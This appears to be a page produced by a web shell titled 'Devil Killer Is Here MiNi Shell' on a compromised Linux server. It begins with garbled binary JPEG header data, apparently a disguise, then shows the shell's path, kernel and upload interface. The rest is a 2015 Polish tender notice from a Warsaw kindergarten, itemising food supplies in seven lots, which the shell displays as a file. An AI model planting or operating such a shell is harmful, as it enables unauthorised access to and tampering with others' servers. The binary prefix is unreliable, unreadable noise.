JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151211/183119-N-2015.html

<p class="kh_header"><b>Warszawa: Dostawa artykułów spożywczych z podziałem na pakiety</b><br>
<b>Numer ogłoszenia: 183119 - 2015; data zamieszczenia: 11.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Nr 4 , ul. Elektoralna 15/17, 00-137 Warszawa, woj. mazowieckie, tel. 22 620 42 46, faks 22 620 42 46.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przedszkole4.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gminna samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych z podziałem na pakiety.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów spożywczych z podziałem na pakiety.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość zwiększenia zamówienia, wielkości nie większej niż 20 % zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana 
w oparciu o złożone oświadczenia metodą spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana 
w oparciu o złożone oświadczenia metodą spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana 
w oparciu o złożone oświadczenia metodą spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana 
w oparciu o złożone oświadczenia metodą spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana 
w oparciu o złożone oświadczenia metodą spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przedszkole4.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole Nr 4, ul. Elektoralna 15/17, 00-137 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.12.2015 godzina 10:00, miejsce: Przedszkole Nr 4, ul. Elektoralna 15/17, 00-137 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Mięso, wędlina.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cielęcina zadnia bez kości, w kawałkach minimum 500g, świeża	
Kg
	
100

Mięso z piersi indyka bez skóry, bez kości, świeże, gat. I	
Kg	
150

Mięso z piersi kurczaka bez skóry bez kości, świeże, gat. I	
Kg	
130

Kurczak -udka (pałki) , świeże, gat. I	
Kg	
120

Kurczak ćwiartki	
Kg
	
50

Schab wieprzowy środkowy, bez kości, o średnicy nie większej niż  10cm,bez tłuszczu, świeży, gat. I	
Kg	
100

Wieprzowina łopatka świeża, gat. I	
Kg	
40

Wieprzowina szynka surowa, bez kości świeża gat. I	
Kg	
120

Wołowina - pręga  bez kości, świeża, gat. I	
Kg
	
40

Kiełbasa krakowska, sucha, nie parzona, gat. I	
Kg	
40

Kiełbasa żywiecka sucha, nie parzona, gat. I	
Kg	
20

Parówki wieprzowe z szynki o zawartości mięsa minimum 90% 
typu sokołów gat. I	
Kg
	
80

Polędwica sopocka 
o zawartości mięsa wieprzowego minimum 81% gat. I	
Kg	
50

Schab wieprzowy środkowy w majeranku o zawartości mięsa minimum 78% pieczony gat. I 	
Kg
	
20

Filet z indyka wędzony, parzony o zawartości mięsa minimum 79% gat. I typu indyk babuni sokołów	
Kg 	
20

Szynka wieprzowa o zawartości mięsa z szynki minimum 83% gat. I, bez widocznego tłuszczu,  typu sokołów	
Kg	
30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Mrożonki, ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Borówka amerykańska, mrożona, opakowanie.  nie większe niż 500g. gat. I	
Kg 	
30

Brokuły, opakowanie nie większe niż 2500g. gat. I	
Kg
	
80
Brzoskwinia kostka mrożona opakowanie nie większe niż 500g	
Kg	
30

Bukiet warzyw  opakowanie nie większe niż 2500g. gat. I	
Kg
	
20
Barszcz ukraiński opakowanie nie większe niż 2500g. gat. I	
kg	
80

Buraki mrożone wiórki opakowanie 450-500g gat. I	
Kg
	
100

Buraki mrożone puree opakowanie 450-500g gat. I	
Kg 	
100
Dynia krojona kostka mrożona, opakowanie nie większe niż 2500g. gat. I	
kg	
20

Fasolka szparagowa żółta, zielona opakowanie nie większe niż 2500g. gat. I	
Kg
	
30

Groszek  zielony mrożony opakowanie nie większe niż 2500g. gat. I	
Kg 	        20

Kalafior mrożony  opakowanie nie większe niż 2500g. gat. I	
Kg
	
30
Kukurydza mrożona opakowanie nie większe niż 2500g. gat. I	
kg	
20

Marchewka z groszkiem mrożona opakowanie nie większe niż 2500g. gat. I	
Kg	
80
Marchewka krojona w kostkę, opakowanie nie większe niż 2500g. gat. I	
Kg
	
50

Marchewka mini opakowanie nie większe niż 2500g. gat. I	
Kg
	
60

Maliny opakowanie nie większe niż 2500g. gat. I
	
Kg
	
30

Mieszanka kompotowa opakowanie nie większe niż 2500g. gat. I	
Kg
	
180
Morela krojona kostka mrożona , opakowanie nie większe niż 500g	
Kg	
20

Zupa jarzynowa, opakowanie nie większe niż 2500g. gat. I	
Kg
	
100

Porzeczka czarna opakowanie nie większe niż 2500g. gat. I	
Kg
	
20

Śliwki bez pestek opakowanie nie większe niż 2500g. gat. I	
Kg
	
180
Szpinak rozdrobniony mrożony op. 500g	
kg	
20

Truskawki opakowanie nie większe niż 2500g. gat. I	
Kg
	
500
Mieszanka owocowa do koktajli nie większe niż 2500g. gat. I	
Kg 	
30

Włoszczyzna krojona w paski opakowanie nie większe niż 2500g. gat. I	
Kg
	
200

Włoszczyzna krojona w kostkę  opakowanie nie większe niż 2500g. gat. I	
Kg	
200
Mintaj mrożony extra I gatunek - filety mrożone pojedynczo, bez skóry, bez ości nie więcej niż 3% glazury technologicznej gat. I 	
Kg	
40
FILET Z MIRUNY, mrożony, nie więcej niż 3% glazury technologicznej gat. I opakowanie (szaterpack) 6,8-7,0kg	
kg	
40

Dorsz mrożony extra I gatunek - filety mrożone pojedynczo, bez skóry, bez ości, nie więcej niż 3% glazury technologicznej gat. I	
Kg	
80

Makrela wędzona świeża, pakowana próżniowo w folię, tusze nie mniejsze niż 350g	
Kg	
40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mleko pasteryzowane w  folii 1 litr 3,2% tłuszczu	
Litr	
1700

Mleko pasteryzowane w  folii 1 litr 3,2% tłuszczu z dopłatą A.R.R.	
Litr	
1700

Mleko UHT 3,2% tłuszczu	
Litr	
200

Masło extra,  świeże 
w kostkach op. 200 g o zawartości tłuszczu 82,5% typu łaciate, garwolin	
Szt	
1200

Śmietana 18% tłuszczu w op. 400g typu piątnica 	
Szt	
900

Ser twarogowy półtłusty pakowany w folię	
Kg	
700
Ser żółty w plastrach Gouda op. 1 kg, pakowany w atmosferze ochronnej, typu mlekovita	Kg 	20

Ser żółty Gouda, Edamski, Morski- tłusty	
Kg	
60

Ser żółty Gouda, Edamski, Morski- tłusty z dopłatą A.R.R.	
Kg 	
60

Serek homogenizowany naturalny op. 200 g, typu rolmlecz	
Szt	
1000

Jogurt owocowy op.130-150g z zawartością cukrów nie więcej niż 10g  w 100g produktu	
Szt	
1000

Jogurt naturalny op.370 zawartość składników w 100g: tłuszcz- 3g, wartość energet. 67kcal typu zott	
Szt	
400

Jogurt naturalny op. 1000 g. zawartość składników w 100g: tłuszcz 2g -3g,  typu zott, krasnystaw	
Szt. 	
500

Jogurt naturalny 
op.180 g.zawartość składników w 100g: tłuszcz- 3g, wartość energet. 67kcal typu zott	
Szt	
800
Jogurt typu greckiego 330 g. typu zott
	Szt.	20

Mozzarella w zalewie, waga bez zalewy-125g typu galbani lub zott 	
Szt.	 
100

Mozzarella w zalewie - mini kulk, waga bez zalewy 125g typu galbani lub zott 	
Szt.	 
100

Kefir, zaw. tłuszczu min. 1,5% op. 500g
	
Litr	
20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Owoce, warzywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Brokuły świeże gat. I	
Szt	
100


Buraki świeże gat.I	
Kg 	
150

Brukselka świeża gat. I	
Kg 	
10

Cebula biała, świeża gat. I	
Kg	
150

Cukinia świeża  z miękką skórką, maksymalna długość 30 cm gat. I	
Kg	
10

Cykoria świeża gat. I	
Kg	
10

Czosnek , główka min 70 g, gat. I , polski	
Szt	
100

Dynia  świeża gat. I	
Kg 	
15

Fasolka szparagowa żółta, zielona, bez łyka,  świeża gat. I	
Kg 	
20

Imbir świeży 	
Kg 	
2

Kabaczek świeży, maksymalna długość 30 cm, gat. I	
Kg	
10

Kalafior świeży, gat. I	
Szt	
30

Kapusta biała w główkach, świeża gat. I	
Kg	
60

Kapusta biała w główkach, młoda gat. I (od maja do sierpnia)	
Kg	
40

Kapusta kiszona, nieprzekwaszona gat. I opakowanie wiaderko plastikowe szczelnie zamknięte pokrywą	
Kg	
50

Kapusta pekińska świeża gat. I	
Kg	
120

Kapusta włoska świeża gat. I	
Kg	
50

Kapusta czerwona świeża gat. I	
Kg	
40

Koper świeży w pęczkach, gat. I	
Szt	
200

Kalarepka świeża gat. I	 
Szt. 	
30

Kiełki rzodkiewki, słonecznika,  op. pojemnik  plast.50-100g	
Szt. 	
80

Marchew karotka, świeża gat. I	
Kg	
220


Natka świeża w pęczkach,  gat. I	
Szt	
220

Ogórek świeży gat. I	
Kg	
130

Ogórek kiszony, twardy, gat. I opakowanie - wiaderko plastikowe szczelnie zamknięte pokrywą	
Kg	
160

Ogórek małosolny , twardy, gat. I opakowanie wiaderko plastikowe szczelnie zamknięte pokrywą	
Kg
	
25

Papryka czerwona, żółta, pomarańczowa, świeża 
gat. I	
Kg	
90

Pieczarki świeże o średnicy nie większej  niż 4 cm.,   gat. I	
Kg	
20

Pietruszka świeża gat. I	
Kg	
20

Pomidory świeże gat. I	
Kg	
150

Pomidorki koktajlowe 
świeże gat. I	
Kg	
20

Pory świeże, średnica minimum 3 cm gat. I	
Szt	
25

Rzodkiewka świeża gat. I	
Szt	
180

Sałata masłowa świeża 
gat. I	
Szt	
80

Sałata rzymska świeża 
gat. I	
Szt	
40

Sałata lodowa świeża 
gat. I	
Szt	
70

Seler korzeniowy świeży gat. I	
Kg	
20

Szczypiorek świeży w pęczkach, cienki, gat. I	
Szt	
100

Ziemniaki młode (od maja do sierpnia) o średnicy minimum 6 cm	
Kg
	
700

Ziemniaki późne (od września do kwietnia ) typu Irga, konsumpcyjne, bez kiełkujących oczek, bez zielonych przebarwień	
Kg	
2400

Gruszki świeże, odmiany: Konferencja, Generał, Klapsa - gat. I	
Kg	
250
Zioła świeże w doniczkach (bazylia, mięta, majeranek, tymianek) małe doniczki	
     Szt
	
20

Jabłka Cortland. Ligol, Champion, Delikates, Antonówka, Reneta  świeże, bez plam gat. I
	
Kg	
700

Maliny w opakowaniu tekturowym 500g	
Szt
	
50

Truskawki świeże, pakowane w łubianki, gat I , polskie	
Kg	
100

Śliwki świeże z pestkami łatwo odchodzącymi od miąższu gat. I	
Kg	
80
NATURALNY SOK TŁOCZONY 100%, pasteryzowany, zawierający min. 1500g owoców na 1000ml soku, smaki: jabłko, jabłko-aronia, jabłko-gruszka, opakowanie karton 5000ml
	Szt	170

Arbuz dojrzały, słodki, świeży, gat. I	
Kg	
150

Ananas gat. I	
      Szt.  	
20

Banany bez plam, gat. I typu chiguita	
Kg	
500

Borówka  świeża, polska
gat. I (sierpień - październik)	
Kg 	
50

Brzoskwinie świeże, słodkie, soczyste, gat. I	
Kg
	
50

Cytryny gat. I	
Kg	
50

Kaki, dojrzałe, słodkie gat. I	
Szt
	
120

Kiwi dojrzałe, gat. I
	
Szt	
500

Mandarynki słodkie, soczyste, bez pestek, gat. I	
Kg
	
250

Melon słodki, soczysty, gat. I	
Kg	
90

Mango świeże, gat. I	
Szt	  
40

Nektarynki świeże, słodkie, soczyste, gat. I	
Kg
	
30


Pomarańcze słodkie, soczyste, gat. I	
Kg	
200

Winogrona, rodzynkowe-bezpestkowe, jasne, ciemne różowe, gat. I	
Kg	
180

Winogrona,  jasne,  ciemne różowe, słodkie, gat. I	
Kg
	
30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb baltonowski krojony 400-500g	
Szt	
700

Chleb razowy krojony 450g	
Szt	
150

Chleb razowy ze słonecznikiem krojony 500g	
Szt	
200

Chleb razowy z miodem 500 g	
Szt.	
50

Chleb orkiszowy 400-500g z zawartością mąki pszennej orkisz typu 750 minimum 50%, na naturalnym zakwasie	
szt	
300
Chleb kukurydziany 300-350g z zawartością mąki kukurydzianej minimum 55%	
szt	
30

Chałka 300g	
Szt	
100

Grahamki 30g z mąki pszennej typu graham bez barwników, karmelu i polepszaczy, na naturalnym zakwasie	
Szt	
3000

Bułka wrocławska 300g krojona bez dodatku margaryny	
Szt	
500

Kajzerki pszenne 30g bez polepszaczy	
Szt	
1800
Bułki żytnie z mąki żytniej lub razowej 30g bez sztucznych barwników	
szt	
800
Bułki 30-50g pszenne lub z mąki mieszanej z dodatkiem ziaren dyni lub słonecznika lub sezamu 	
szt	
600

Bułka tarta 0,5 kg	
Szt	
100

Bułeczki maślane 30g	
Szt
	
300

Rogaliki maślane 30-50g	
Szt	
400

Drożdżówka z jabłkiem 80g - 100 g	
Szt
	
240

Drożdżówka z serem 80g - 100 g	
Szt
	
240

Drożdżówka z budyniem 80g - 100 g	
Szt
	
160

Bagietki pszenne 300-350g	
Szt	
200

Jagodzianki  80-100g	
Szt	
160

Ciasto drożdżowe z rodzynkami	
Kg	
40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bazylia op. 10-15g
typu kamis lub typu prymat	
Szt
	
20

Budyń waniliowy lub śmietankowy z cukrem, bez sztucznych barwników,  opakowanie 60g typu winiary	
Szt	
400

Cynamon w proszku op. 10-20 g typu kamis lub typu prymat	
Szt	
40
Ciecierzyca typu sante op. 350 g.	
Szt. 	
20

Chrzan w słoikach 300g, bez dodatku octu	
Szt	
10

Cukier op.1000g	
Kg
	
30

Cukier puder op.  400g	
Szt	
15

Cukier waniliowy op. 32g	
Szt	
10

Curry Przyprawa op. 20 g.	
Szt. 	
10
Chipsy z plasterków jabłek, truskawek, brzoskwiń 
op. 10 g - 20 g. 	
Szt.	
1000
Czosnek granulowany op. 20 g. typu kamis lub typu prymat	
Szt. 	
20

Daktyle suszone op. 400 g. typu bakalland	
Szt.	
10

Drożdże op. 100 g	
Szt	
20

Drożdże instant op. 7g typu dr oetker	
Szt	
70

Dżem owocowy, bez cukru, zawartość owoców 100g na 100g produktu gotowego, zawiera sok jabłkowy, 
op. słoik szklany 220g, typu łowicz	
Szt	
100

Fasola sucha, biała, drobna gat. I 	Kg 	10

Gałka muszkatołowa, mielona op. 10g typu kamis lub typu prymat	
Szt.	
20

Goździki  całe op. 10g typu kamis lub typu prymat	
Szt. 	
70

Groch łuskany, nasiona suche opakowanie 400g	
Kg	
16


Herbata czarna, ekspresowa typu lipton  op. 100 szt	
Szt	
20


Herbata owocowa ekspresowa hibiscus, malina, owoce leśne, bez sztucznych barwników i aromatów (op. 20-25 szt.)	
Szt	
50
Imbir mielony 15 g. typu kamis lub typu prymat	Szt. 	10

Kasza jęczmienna perłowa, drobna op. maksimum 1000g	
Kg	
70

Kakao o obniżonej zawartości tłuszczu 
z zawartością 11% tłuszczu kakaowego op. 200 g 
typu wedel	
Szt	
80

Kasza gryczana op. nie większe niż 1000g	
Kg	
70


Kasza jaglana op. nie większe niż 1000g	
Kg	
25
Kasza kukurydziana, typu sanko	Kg 	20

